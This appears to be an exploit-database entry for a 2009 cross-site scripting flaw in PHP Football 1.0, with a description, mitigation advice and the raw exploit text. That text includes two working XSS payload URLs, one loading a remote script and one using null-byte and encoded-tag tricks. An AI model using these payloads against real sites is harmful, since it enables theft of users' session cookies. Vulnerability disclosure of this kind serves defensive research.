header-logo
Suggest Exploit
vendor:
PHP Football
by:
indoushka
7.5
CVSS
HIGH
Cross Site Scripting (XSS)
79
CWE
Product Name: PHP Football
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:nextdesign:php_football:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux
2009

PHP Football Version : 1.0 Cross Site Scripting Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input in 'news.mainnews.php' and 'filter.php' scripts. A remote attacker can execute arbitrary HTML and script code in a browser in the context of the vulnerable website. This can allow the attacker to create a specially crafted request that will execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server. This may help the attacker to steal cookie-based authentication credentials and launch other attacks.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to dynamically generate web content. It is also recommended to use a web application firewall to help protect against this type of attack.
Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : PHP Football Version : 1.0 Cross Site Scripting Vulnerability           |
| # Author   : indoushka                                                               |
| # email    : indoushka@hotmail.com                                                   |
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
| # Web Site : www.iq-ty.com                                                           |
| # Script   : PHP Football Version : 1.0 http://www.nextdesign.eu.org/                |
| # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu)       |
| # Bug      : XSS                                                                     | 
======================      Exploit By indoushka       =================================
| # Exploit  : 
| 
| 1- http://127.0.0.1:80/PHPfootball/scripts/news.mainnews.php?dbfield=Content&dbtable=News&Id=1<ScRiPt+src=http://127.0.0.1/xss.js?213771818860></ScRiPt>
| 2- http://127.0.0.1/PHPfootball/scripts/filter.php?dbtable=Games&dbfield=1%00"'><ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>&style=normal
|
================================   Dz-Ghost Team   ========================================
Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 |
-------------------------------------------------------------------------------------------